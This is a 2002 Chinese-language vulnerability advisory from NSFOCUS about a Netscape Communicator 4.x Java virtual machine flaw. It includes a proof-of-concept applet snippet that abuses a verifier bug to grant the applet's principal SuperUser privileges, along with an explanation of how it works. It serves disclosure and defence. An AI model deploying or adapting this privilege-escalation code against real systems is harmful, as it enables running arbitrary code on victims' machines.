首页 -> 安全研究

安全研究

安全漏洞
Netscape Java虚拟机不安全调用漏洞

发布日期:2002-11-21
更新日期:2002-11-28

受影响系统:
Netscape Communicator 4.79
Netscape Communicator 4.78
Netscape Communicator 4.77
Netscape Communicator 4.76
Netscape Communicator 4.75
Netscape Communicator 4.74
Netscape Communicator 4.73
Netscape Communicator 4.72
Netscape Communicator 4.7
Netscape Communicator 4.61
Netscape Communicator 4.6
Netscape Communicator 4.51
Netscape Communicator 4.5
Netscape Communicator 4.0
    - Linux系统  
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000
    - Unix系统
描述:
BUGTRAQ  ID: 6223

Netscape Communicator/Navigator的JVM实现使用了Symantec Just In Time(JIT)编译器,Java虚拟机在共享动态实现,并默认被Netscape Browser使用。

Netscape 4浏览器Java虚拟机实现由于部分方法被调用的时候不安全,远程攻击者可以利用这个漏洞构建恶意Java Applet,在JVM环境中装载恶意类而可能以高权限执行任意代码。

构建如下applet代码运行在Netscape 4.x web浏览器中可以导致权限提升:

PrivilegeManager pm=PrivilegeManager.getPrivilegeManager();

VerifierBug bug=new VerifierBug();
MyPrivilegeManager mpm=bug.cast2MyPrivilegeManager(pm);

Target target=Target.findTarget("SuperUser");
Privilege priv=Privilege.findPrivilege(Privilege.ALLOWED,Privilege.FOREVER);

PrivilegeTable privtab=new PrivilegeTable();
privtab.put(target,priv);

Principal principal=PrivilegeManager.getMyPrincipals()[0];
mpm.itsPrinToPrivTable.put(principal,privtab);

try {
ClassLoader cl=getClass().getClassLoader();
Class c=cl.loadClass("Beyond");
c.newInstance();
} catch (Throwable e) {}

获得Privilege Manager object引用指针的值并保存在pm变量中,然后可利用Netscape JVM中的一个缺陷结合其他漏洞提升权限。

实际提升权限的攻击在如下代码中:

Principal principal=PrivilegeManager.getMyPrincipals()[0];
mpm.itsPrinToPrivTable.put(principal,privtab);

首先,从PrivilegeManager类的Principal列表中获取一个Principal的引用,然后修改mpm的成员变量itsPrinToPrivTable,以给用户applet类增加新的权限信息。成员变量itsPrinToPrivTable是一个hash表,它保存了类的Principals和权限列表之间的关联信息。这样的修改结果,使得一个用户applet类的Principal与系统权限表关联起来。显然,在缺省情况下,applet类的Principals有一个空的权限表,这里,将它们与系统权限表关联起来。

<*来源:LSD (contact@lsd-pl.net
  
  链接:http://www.lsd-pl.net/documents/javasecurity-1.0.0.pdf
*>

建议:
厂商补丁:

Netscape
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.netscape.com

浏览次数:3146
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客